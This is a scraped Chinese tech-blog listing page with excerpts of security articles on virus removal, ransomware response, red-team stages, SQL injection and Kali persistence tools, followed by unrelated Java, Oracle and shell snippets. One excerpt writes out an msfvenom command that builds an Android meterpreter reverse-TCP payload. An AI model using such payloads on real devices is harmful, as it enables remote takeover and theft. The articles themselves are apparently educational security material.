<div>对熊猫烧香进行手动查杀学习笔记:手动查杀:只不通过代码的方式对病毒进行查杀,通过鼠标指指点点+DOS命令实现杀毒粗浅,往往不能查杀干净并不代表什么软件都不用,专业分析软件手动查杀病毒木马固定的流程:1.排查可疑进程。因为病毒往往会创建出来一个或多个进程,因此我们需要分辨出哪些进程是由病毒所创建,然后删除可疑进程。2.检查启动项。病毒为了实现自启动,会采用一些方法将自己添加到启动项中,从而实现自启动</div> </li> <li><a href="/article/1899633139899232256.htm" title="应急响应——勒索病毒风险处置" target="_blank">应急响应——勒索病毒风险处置</a> <span class="text-muted">ad_m1n</span> <a class="tag" taget="_blank" href="/search/%E4%B9%A6%E7%B1%8D%E5%B7%A5%E5%85%B7%E8%B5%84%E6%96%99%E6%94%B6%E9%9B%86/1.htm">书籍工具资料收集</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95/1.htm">面试</a> <div>勒索病毒简介勒索病毒是一种电脑病毒,其性质恶劣、危害极大,一旦感染将给用户带来无法估量的损失。这种病毒主要以邮件、程序木马、网页挂马的形式进行传播,并利用各种加密算法对文件进行加密,使得被感染者一般无法解密,必须拿到解密的私钥才有可能破解勒索病毒发作的特征传播方式:勒索病毒主要通过三种途径传播,包括漏洞、邮件和广告推广。其中,通过漏洞发起的攻击占攻击总数的绝大部分,因为老旧系统(如win7、xp等</div> </li> <li><a href="/article/1899620409515503616.htm" title="2024护网行动 _ 红队实战手册 (建议收藏)零基础入门到精通" target="_blank">2024护网行动 _ 红队实战手册 (建议收藏)零基础入门到精通</a> <span class="text-muted">编程瞬息全宇宙</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/arm%E5%BC%80%E5%8F%91/1.htm">arm开发</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a> <div>整理后转于klionsec的github基本流程:入口权限=>内网搜集/探测=>免杀提权[非必须]=>抓取登录凭证=>跨平台横向=>入口维持=>数据回传=>定期权限维护0x01入口权限获取[前期侦察,搜集阶段本身就不存在太多可防御的点,非防御重心]绕CDN找出目标所有真实ip段找目标的各种Web管理后台登录口批量抓取目标所有真实C段Webbanner批量对目标所有真实C段进行基础服务端口扫描探测识</div> </li> <li><a href="/article/1899530725103824896.htm" title="SQL注入渗透与攻防(四)之文件读写" target="_blank">SQL注入渗透与攻防(四)之文件读写</a> <span class="text-muted">怰月</span> <a class="tag" taget="_blank" href="/search/Web%E6%BC%8F%E6%B4%9E/1.htm">Web漏洞</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a> <div>目录SQL注入之文件读写文件读写注入的原理文件读写注入的条件网站绝对路径读取文件写入文件案列演示之文件读取案列演示之文件写入SQL注入之文件读写文件读写注入的原理文件读写注入的原理就是利用文件的读写权限进行注入,它可以写入一句话木马,也可以读取系统文件的敏感信息。文件读写注入的条件高版本的MYSQL添加了一个新的特性secure_file_priv,该选项限制了mysql导出文件的权限。secur</div> </li> <li><a href="/article/1898934285956608000.htm" title="基于深度学习的恶意软件检测系统:设计与实现" target="_blank">基于深度学习的恶意软件检测系统:设计与实现</a> <span class="text-muted">机器懒得学习</span> <a class="tag" taget="_blank" href="/search/%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0/1.htm">深度学习</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a> <div>引言随着信息技术的飞速发展,恶意软件(如病毒、木马、勒索软件等)对全球网络安全构成了严重威胁。传统的恶意软件检测方法(如特征码匹配、行为分析等)在面对新型恶意软件变种时往往力不从心。近年来,深度学习技术在模式识别和分类任务中取得了显著成效,为恶意软件检测领域带来了新的机遇。本文将详细介绍一个基于深度学习的恶意软件检测系统的开发过程,该系统利用长短期记忆网络(LSTM)对Windows可执行程序的A</div> </li> <li><a href="/article/1898838830006464512.htm" title="信息安全技术——渗透攻击" target="_blank">信息安全技术——渗透攻击</a> <span class="text-muted">降江酱姜</span> <a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a> <div>一、渗透攻击的介绍1.1渗透攻击是什么意思1.2渗透攻击的特点1.3渗透攻击的阶段二、渗透攻击的常用方法有哪些2.1获取口令入侵。2.2远程控制入侵2.3.木马入侵2.4电子邮件入侵2.5网络监听入侵2.6SQL注入攻击三、操作演示一、渗透攻击的介绍1.1渗透攻击是什么意思渗透攻击(Penetration,也称“渗透测试”)是一种在授权的情况下,使用技术攻击、破解、测试和安全评估网络系统的安全控制</div> </li> <li><a href="/article/1898827981787295744.htm" title="【Java代码审计 | 第十三篇】XXE漏洞成因及防范" target="_blank">【Java代码审计 | 第十三篇】XXE漏洞成因及防范</a> <span class="text-muted">秋说</span> <a class="tag" taget="_blank" href="/search/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/1.htm">Java代码审计</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/XXE/1.htm">XXE</a> <div>未经许可,不得转载。文章目录XXE漏洞成因解析XML的Java方法DocumentBuilder(原生,可回显)SAXReader(DOM4J,第三方库)SAXBuilder(JDOM,第三方库)SAXParserFactory(原生,不可回显)XMLReaderFactoryDigester(ApacheCommonsDigester)支持XInclude的DocumentBuilderSAXP</div> </li> <li><a href="/article/1898712587214843904.htm" title="[网络安全提高篇] 一二八.恶意软件分析之利用MS Defender实现恶意样本家族批量标注(含学术探讨)" target="_blank">[网络安全提高篇] 一二八.恶意软件分析之利用MS Defender实现恶意样本家族批量标注(含学术探讨)</a> <span class="text-muted">Eastmount</span> <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E8%87%AA%E5%AD%A6%E7%AF%87/1.htm">网络安全自学篇</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E6%81%B6%E6%84%8F%E8%BD%AF%E4%BB%B6%E5%88%86%E6%9E%90/1.htm">恶意软件分析</a><a class="tag" taget="_blank" href="/search/%E6%81%B6%E6%84%8F%E6%A0%B7%E6%9C%AC%E5%AE%B6%E6%97%8F/1.htm">恶意样本家族</a><a class="tag" taget="_blank" href="/search/%E6%A0%87%E6%B3%A8/1.htm">标注</a><a class="tag" taget="_blank" href="/search/MS/1.htm">MS</a><a class="tag" taget="_blank" href="/search/Defender/1.htm">Defender</a> <div>2024新的战场,继续奋斗。“网络安全提高班”新的100篇文章即将开启,包括Web渗透、内网渗透、靶场搭建、CVE复现、攻击溯源、实战及CTF总结,它将更加聚焦,更加深入,也是作者的慢慢成长史。换专业确实挺难的,Web渗透也是块硬骨头,但我也试试,看看自己未来四年究竟能将它学到什么程度,漫漫长征路,偏向虎山行。享受过程,一起加油~前文介绍了IDAPython配置过程和基础用法,然后尝试提取恶意软件</div> </li> <li><a href="/article/1898517630566854656.htm" title="Kali Linux渗透基础知识整理(四):维持访问" target="_blank">Kali Linux渗透基础知识整理(四):维持访问</a> <span class="text-muted">陆小马</span> <a class="tag" taget="_blank" href="/search/%E9%BB%91%E5%AE%A2%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">黑客网络安全</a><a class="tag" taget="_blank" href="/search/%E9%BB%91%E5%AE%A2/1.htm">黑客</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2/1.htm">网络攻防</a> <div>在获得了目标系统的访问权之后,攻击者需要进一步维持这一访问权限。使用木马程序、后门程序和rootkit来达到这一目的。维持访问是一种艺术形式,思想比渗透更加重要。NetcatCryptcatweevelycymothoaNetcatNetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(networkconnection)。它被设计成一个可靠的后端(back-end)工具,能被</div> </li> <li><a href="/article/1898412504162299904.htm" title="闪客网盘同款的运营级网盘系统网站源码" target="_blank">闪客网盘同款的运营级网盘系统网站源码</a> <span class="text-muted">timesky</span> <a class="tag" taget="_blank" href="/search/php/1.htm">php</a> <div>闪客网盘同款的运营级网盘系统网站源码,一款非常实用的网盘系统,支持转存和限速下载,VIP开启高速下载!源码无任何后门木马亲测,放心使用可以帮助您打造一个安全可靠的网盘分享平台,该系统支持用户使用微信扫码关注公众号登录,上传文件分享链接可自定义,文件可一键保存到我的网盘,支付易支付和官方支付接口!搭建说明Nginx1.20PHP7.1-7.3MySOL5.6phpMyAdmin5.11.上传源码到根</div> </li> <li><a href="/article/1898351059491942400.htm" title="网络安全检查漏洞内容回复 网络安全的漏洞" target="_blank">网络安全检查漏洞内容回复 网络安全的漏洞</a> <span class="text-muted">网络安全指导员</span> <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E7%A8%8B%E5%BA%8F%E5%91%98/1.htm">程序员</a><a class="tag" taget="_blank" href="/search/%E9%BB%91%E5%AE%A2/1.htm">黑客</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> <div>网络安全的核心目标是保障业务系统的可持续性和数据的安全性,而这两点的主要威胁来自于蠕虫的暴发、黑客的攻击、拒绝服务攻击、木马。蠕虫、黑客攻击问题都和漏洞紧密联系在一起,一旦有重大安全漏洞出现,整个互联网就会面临一次重大挑战。虽然传统木马和安全漏洞关系不大,但最近很多木马都巧妙的利用了IE的漏洞,让你在浏览网页时不知不觉的就中了招。安全漏洞的定义已经有很多了,我这里给出一个通俗的说法就是:能够被利用</div> </li> <li><a href="/article/1898195020507312128.htm" title="2025年渗透测试面试题总结-字某跳动-安全研究实习生(三面)(题目+回答)" target="_blank">2025年渗透测试面试题总结-字某跳动-安全研究实习生(三面)(题目+回答)</a> <span class="text-muted">独行soc</span> <a class="tag" taget="_blank" href="/search/2025%E5%B9%B4%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E9%9D%A2%E8%AF%95%E6%8C%87%E5%8D%97/1.htm">2025年渗透测试面试指南</a><a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95/1.htm">面试</a><a class="tag" taget="_blank" href="/search/%E8%81%8C%E5%9C%BA%E5%92%8C%E5%8F%91%E5%B1%95/1.htm">职场和发展</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a> <div>网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录字某跳动-安全研究实习生(三面)一、攻防演练经典案例分析二、CSRF漏洞修复方案三、Java代码审计流程四、SQL注入防御体系五、域名访问技术解析六、登录页安全风险七、安全工具开发实践字某跳动-安全研究实习生(三面)聊聊攻防演练中比较得意,印象深刻的一次经历CSRF漏</div> </li> <li><a href="/article/1897773707582042112.htm" title="黑客攻击和入侵的八大常用手段有哪些?" target="_blank">黑客攻击和入侵的八大常用手段有哪些?</a> <span class="text-muted">~小羊没烦恼~</span> <a class="tag" taget="_blank" href="/search/php/1.htm">php</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a> <div>此文章主要向大家讲述的是黑客攻击与入侵的八个常用手段,现在合格攻击的手段早已不仅仅是早期刚出现如病毒、木马、以及间谍软件与网络监听、口令攻击、漏洞攻击等这些攻击手段。黑客攻击技术近年来的最新动态是什么?来,一起看看黑客攻击和入侵的8枪——八大手段。第一枪:硬件安全利用硬件的黑客技术虽然报道不多,但它的的确确出现了:在BIOS芯片中植入病毒木马,让目前的防火墙、防毒软件都失效;针对主机板上的电磁辐射</div> </li> <li><a href="/article/1897560112873140224.htm" title="2020年“磐云杯”网络空间安全技能竞赛全国拉赛" target="_blank">2020年“磐云杯”网络空间安全技能竞赛全国拉赛</a> <span class="text-muted">Beluga</span> <a class="tag" taget="_blank" href="/search/%E4%B8%AD%E8%81%8C%E7%BD%91%E7%BB%9C%E7%A9%BA%E9%97%B4%E5%AE%89%E5%85%A8%E8%B5%9B%E9%A2%98/1.htm">中职网络空间安全赛题</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E7%A9%BA%E9%97%B4%E5%AE%89%E5%85%A8/1.htm">网络空间安全</a><a class="tag" taget="_blank" href="/search/%E4%B8%AD%E7%A7%91%E7%A3%90%E4%BA%91/1.htm">中科磐云</a> <div>2020年“磐云杯”网络空间安全技能竞赛全国拉赛一、竞赛阶段竞赛阶段任务阶段竞赛任务竞赛时间分值第一阶段单兵模式系统渗透测试任务1Wireshark数据包分析100分钟100任务2系统漏洞扫描与利用100任务3服务漏洞扫描于测试100任务4Web渗透测试100任务5Windows操作系统渗透测试100任务6Linux操作系统渗透测试100任务7主机存活扫描渗透测试100备战阶段攻防对抗准备工作20</div> </li> <li><a href="/article/1897314686068649984.htm" title="【网络安全】Web渗透测试攻防之浅述信息收集" target="_blank">【网络安全】Web渗透测试攻防之浅述信息收集</a> <span class="text-muted">网络安全居居</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/1.htm">计算机网络</a> <div>前言众所周知渗透测试的本质是信息收集,在渗透测试中信息收集的质量直接关系到渗透测试成果的与否。在对系统进行渗透测试前的信息收集是通过各种方式获取所需要的信息,收集的信息越多对目标进行渗透的优势越有利。通过利用获取到的信息对系统进行渗透。只有掌握了足够多的目标信息才能更好的对目标系统进行渗透。正所谓知彼知己百战不殆。1.信息收集的分类从信息收集方式分类可将信息收集分为两大类:①主动信息收集②被动信息</div> </li> <li><a href="/article/1896712507733635072.htm" title="网络安全简介" target="_blank">网络安全简介</a> <span class="text-muted">星河如雨落</span> <a class="tag" taget="_blank" href="/search/%E8%BD%AF%E8%80%83%E7%BD%91%E7%BB%9C%E5%B7%A5%E7%A8%8B%E5%B8%88/1.htm">软考网络工程师</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%8D%8F%E8%AE%AE/1.htm">网络协议</a><a class="tag" taget="_blank" href="/search/1024%E7%A8%8B%E5%BA%8F%E5%91%98%E8%8A%82/1.htm">1024程序员节</a> <div>网络安全简介文章目录网络安全简介1恶意代码1.1病毒1.2网络蠕虫1.3特洛伊木马1.4后门漏洞2网络攻击2.1主动攻击与被动攻击2.2常见网络攻击类型3网络安全设备3.1防火墙3.2入侵检测设备IDS3.3入侵防御系统IPS3.4网闸3.5其余设备4数据加密与解密4.1非对称加密算法(公钥密码体制)4.2对称加密算法(私钥密码体制)4.3摘要算法5数字证书与数字签名5.1公钥基础设施(PKI)5</div> </li> <li><a href="/article/1896624118153932800.htm" title="360个人版和企业版的区别" target="_blank">360个人版和企业版的区别</a> <span class="text-muted">小魚資源大雜燴</span> <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/windows/1.htm">windows</a> <div>功能方面管理能力个人版:主要用于单台设备的安全防护,只能在单独的电脑上进行安装使用,无集中管理和监控其他设备的功能。企业版:可批量管理大量电脑,如公司的十台、百台甚至千台电脑。管理员能通过管理控制台对所有终端进行统一管理,包括查看电脑的CPU、内存运行状态,掌握累计使用流量等。安全防护个人版:侧重于基本的实时保护功能,如防病毒、防木马、拦截恶意软件等,保护个人用户免受常见网络威胁。企业版:提供更高</div> </li> <li><a href="/article/1896604439343591424.htm" title="【网络安全】敏感字段扫描工具(可用于漏洞挖掘、代码审计)" target="_blank">【网络安全】敏感字段扫描工具(可用于漏洞挖掘、代码审计)</a> <span class="text-muted">秋说</span> <a class="tag" taget="_blank" href="/search/%E7%BD%91%E5%AE%89%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8%E6%95%99%E7%A8%8B%28%E5%85%A8%29/1.htm">网安渗透工具使用教程(全)</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a> <div>原创文章,禁止转载。读者可对脚本进行二次创作,以适配个人需求。文章目录ScanSensitiveInfo.py效果图ScanSensitiveInfo.py该脚本用于扫描敏感字段、代码中可能引入的第三方JS链接/服务以及可能涉及信息泄露的请求方法。1、脚本采用单线程处理,避免多线程导致的混行问题。2、为避免硬编码或其他潜在问题,脚本会对指定目录下的所有文件进行全量扫描。3、用法:pythonSca</div> </li> <li><a href="/article/1896374305361555456.htm" title="关于MSF手机渗透木马制作" target="_blank">关于MSF手机渗透木马制作</a> <span class="text-muted">嗨起飞了</span> <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E6%94%BB%E5%87%BB%E6%A8%A1%E5%9E%8B/1.htm">网络攻击模型</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a> <div>基于Metasploit的Android渗透测试防御指南⚠️法律声明本文所有技术内容仅用于安全研究,严禁非法使用!测试需获得合法授权。一、环境搭建#Kali基础环境sudoaptupdate&&sudoaptinstall-ymetasploit-frameworkapktool二、载荷生成msfvenom-pandroid/meterpreter/reverse_tcp\LHOST=your_v</div> </li> <li><a href="/article/1896010316047773696.htm" title="老毛桃、大白菜、微PE几款PE优劣对比" target="_blank">老毛桃、大白菜、微PE几款PE优劣对比</a> <span class="text-muted">小魚資源大雜燴</span> <a class="tag" taget="_blank" href="/search/windows/1.htm">windows</a> <div>【纯净度】老毛桃:可能会修改浏览器主页,且会捆绑如360全家桶、淘宝等软件。大白菜:与老毛桃类似,存在修改主页和捆绑软件的情况,制作启动盘时若不把赞助商广告去掉,安装系统后会自动安装赞助商软件。微PE:被公认为最纯净的PE工具箱,无任何广告推广、无病毒及木马,也不会篡改浏览器主页或添加多余软件启动项。【功能丰富度】老毛桃:功能全面,支持GHOST与原版系统安装,可引导双显卡笔记本进PE,有防蓝屏新</div> </li> <li><a href="/article/1895307795192934400.htm" title="对抗启发式代码仿真检测技术分析" target="_blank">对抗启发式代码仿真检测技术分析</a> <span class="text-muted">betteroneisme</span> <a class="tag" taget="_blank" href="/search/%E9%9A%8F%E4%BE%BF%E7%9C%8B%E7%9C%8B/1.htm">随便看看</a><a class="tag" taget="_blank" href="/search/%E5%90%AF%E5%8F%91%E5%BC%8F/1.htm">启发式</a><a class="tag" taget="_blank" href="/search/%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81%E6%A3%80%E6%B5%8B/1.htm">恶意代码检测</a> <div>对抗启发式代码仿真检测技术分析。最近在研究病毒的检测技术,虽然在这个木马、流氓件猖獗的年代,检测技术(除了考虑效率因素外)已经变得不是十分重要了。但俺仍然出于兴趣想从这里面寻找些思路。或许对抗技术的本身并不在于谁彻底打败了谁,而在于彼此间共同进步。在查阅资料中发现了这篇文章(Antiheuristictechniquesauthor:BlackJack),虽然是比较古老的,但还是可以从中获得很多新</div> </li> <li><a href="/article/53.htm" title="二分查找排序算法" target="_blank">二分查找排序算法</a> <span class="text-muted">周凡杨</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E4%BA%8C%E5%88%86%E6%9F%A5%E6%89%BE/1.htm">二分查找</a><a class="tag" taget="_blank" href="/search/%E6%8E%92%E5%BA%8F/1.htm">排序</a><a class="tag" taget="_blank" href="/search/%E7%AE%97%E6%B3%95/1.htm">算法</a><a class="tag" taget="_blank" href="/search/%E6%8A%98%E5%8D%8A/1.htm">折半</a> <div> 一:概念 二分查找又称 折半查找( 折半搜索/ 二分搜索),优点是比较次数少,查找速度快,平均性能好;其缺点是要求待查表为有序表,且插入删除困难。因此,折半查找方法适用于不经常变动而 查找频繁的有序列表。首先,假设表中元素是按升序排列,将表中间位置记录的关键字与查找关键字比较,如果两者相等,则查找成功;否则利用中间位置记录将表 分成前、后两个子表,如果中间位置记录的关键字大于查找关键字,则进一步</div> </li> <li><a href="/article/180.htm" title="java中的BigDecimal" target="_blank">java中的BigDecimal</a> <span class="text-muted">bijian1013</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/BigDecimal/1.htm">BigDecimal</a> <div>        在项目开发过程中出现精度丢失问题,查资料用BigDecimal解决,并发现如下这篇BigDecimal的解决问题的思路和方法很值得学习,特转载。         原文地址:http://blog.csdn.net/ugg/article/de</div> </li> <li><a href="/article/307.htm" title="Shell echo命令详解" target="_blank">Shell echo命令详解</a> <span class="text-muted">daizj</span> <a class="tag" taget="_blank" href="/search/echo/1.htm">echo</a><a class="tag" taget="_blank" href="/search/shell/1.htm">shell</a> <div>Shell echo命令 Shell 的 echo 指令与 PHP 的 echo 指令类似,都是用于字符串的输出。命令格式: echo string 您可以使用echo实现更复杂的输出格式控制。 1.显示普通字符串: echo "It is a test" 这里的双引号完全可以省略,以下命令与上面实例效果一致: echo Itis a test 2.显示转义</div> </li> <li><a href="/article/434.htm" title="Oracle DBA 简单操作" target="_blank">Oracle DBA 简单操作</a> <span class="text-muted">周凡杨</span> <a class="tag" taget="_blank" href="/search/oracle+dba+sql/1.htm">oracle dba sql</a> <div> --执行次数多的SQL select sql_text,executions from (      select sql_text,executions from v$sqlarea order by executions desc      ) where rownum<81;  &nb</div> </li> <li><a href="/article/561.htm" title="画图重绘" target="_blank">画图重绘</a> <span class="text-muted">朱辉辉33</span> <a class="tag" taget="_blank" href="/search/%E6%B8%B8%E6%88%8F/1.htm">游戏</a> <div>  我第一次接触重绘是编写五子棋小游戏的时候,因为游戏里的棋盘是用线绘制的,而这些东西并不在系统自带的重绘里,所以在移动窗体时,棋盘并不会重绘出来。所以我们要重写系统的重绘方法。   在重写系统重绘方法时,我们要注意一定要调用父类的重绘方法,即加上super.paint(g),因为如果不调用父类的重绘方式,重写后会把父类的重绘覆盖掉,而父类的重绘方法是绘制画布,这样就导致我们</div> </li> <li><a href="/article/688.htm" title="线程之初体验" target="_blank">线程之初体验</a> <span class="text-muted">西蜀石兰</span> <a class="tag" taget="_blank" href="/search/%E7%BA%BF%E7%A8%8B/1.htm">线程</a> <div>一直觉得多线程是学Java的一个分水岭,懂多线程才算入门。 之前看《编程思想》的多线程章节,看的云里雾里,知道线程类有哪几个方法,却依旧不知道线程到底是什么?书上都写线程是进程的模块,共享线程的资源,可是这跟多线程编程有毛线的关系,呜呜。。。 线程其实也是用户自定义的任务,不要过多的强调线程的属性,而忽略了线程最基本的属性。 你可以在线程类的run()方法中定义自己的任务,就跟正常的Ja</div> </li> <li><a href="/article/815.htm" title="linux集群互相免登陆配置" target="_blank">linux集群互相免登陆配置</a> <span class="text-muted">林鹤霄</span> <a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a> <div>配置ssh免登陆 1、生成秘钥和公钥    ssh-keygen -t rsa 2、提示让你输入,什么都不输,三次回车之后会在~下面的.ssh文件夹中多出两个文件id_rsa 和 id_rsa.pub    其中id_rsa为秘钥,id_rsa.pub为公钥,使用公钥加密的数据只有私钥才能对这些数据解密    c</div> </li> <li><a href="/article/942.htm" title="mysql : Lock wait timeout exceeded; try restarting transaction" target="_blank">mysql : Lock wait timeout exceeded; try restarting transaction</a> <span class="text-muted">aigo</span> <a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a> <div>原文:http://www.cnblogs.com/freeliver54/archive/2010/09/30/1839042.html   原因是你使用的InnoDB   表类型的时候, 默认参数:innodb_lock_wait_timeout设置锁等待的时间是50s, 因为有的锁等待超过了这个时间,所以抱错.   你可以把这个时间加长,或者优化存储</div> </li> <li><a href="/article/1069.htm" title="Socket编程 基本的聊天实现。" target="_blank">Socket编程 基本的聊天实现。</a> <span class="text-muted">alleni123</span> <a class="tag" taget="_blank" href="/search/socket/1.htm">socket</a> <div>public class Server { //用来存储所有连接上来的客户 private List<ServerThread> clients; public static void main(String[] args) { Server s = new Server(); s.startServer(9988); } publi</div> </li> <li><a href="/article/1196.htm" title="多线程监听器事件模式(一个简单的例子)" target="_blank">多线程监听器事件模式(一个简单的例子)</a> <span class="text-muted">百合不是茶</span> <a class="tag" taget="_blank" href="/search/%E7%BA%BF%E7%A8%8B/1.htm">线程</a><a class="tag" taget="_blank" href="/search/%E7%9B%91%E5%90%AC%E6%A8%A1%E5%BC%8F/1.htm">监听模式</a> <div>    多线程的事件监听器模式   监听器时间模式经常与多线程使用,在多线程中如何知道我的线程正在执行那什么内容,可以通过时间监听器模式得到        创建多线程的事件监听器模式 思路:    1, 创建线程并启动,在创建线程的位置设置一个标记     2,创建队</div> </li> <li><a href="/article/1323.htm" title="spring InitializingBean接口" target="_blank">spring InitializingBean接口</a> <span class="text-muted">bijian1013</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a> <div>spring的事务的TransactionTemplate,其源码如下: public class TransactionTemplate extends DefaultTransactionDefinition implements TransactionOperations, InitializingBean{ ... } TransactionTemplate继承了DefaultT</div> </li> <li><a href="/article/1450.htm" title="Oracle中询表的权限被授予给了哪些用户" target="_blank">Oracle中询表的权限被授予给了哪些用户</a> <span class="text-muted">bijian1013</span> <a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/%E6%9D%83%E9%99%90/1.htm">权限</a> <div>        Oracle查询表将权限赋给了哪些用户的SQL,以备查用。 select t.table_name as "表名", t.grantee as "被授权的属组", t.owner as "对象所在的属组"</div> </li> <li><a href="/article/1577.htm" title="【Struts2五】Struts2 参数传值" target="_blank">【Struts2五】Struts2 参数传值</a> <span class="text-muted">bit1129</span> <a class="tag" taget="_blank" href="/search/struts2/1.htm">struts2</a> <div>Struts2中参数传值的3种情况 1.请求参数绑定到Action的实例字段上 2.Action将值传递到转发的视图上 3.Action将值传递到重定向的视图上   一、请求参数绑定到Action的实例字段上以及Action将值传递到转发的视图上 Struts可以自动将请求URL中的请求参数或者表单提交的参数绑定到Action定义的实例字段上,绑定的规则使用ognl表达式语言</div> </li> <li><a href="/article/1704.htm" title="【Kafka十四】关于auto.offset.reset[Q/A]" target="_blank">【Kafka十四】关于auto.offset.reset[Q/A]</a> <span class="text-muted">bit1129</span> <a class="tag" taget="_blank" href="/search/kafka/1.htm">kafka</a> <div>I got serveral questions about  auto.offset.reset. This configuration parameter governs how  consumer read the message from  Kafka when  there is no initial offset in ZooKeeper or </div> </li> <li><a href="/article/1831.htm" title="nginx gzip压缩配置" target="_blank">nginx gzip压缩配置</a> <span class="text-muted">ronin47</span> <a class="tag" taget="_blank" href="/search/nginx+gzip+%E5%8E%8B%E7%BC%A9%E8%8C%83%E4%BE%8B/1.htm">nginx gzip 压缩范例</a> <div>nginx gzip压缩配置 更多 0 nginx gzip 配置   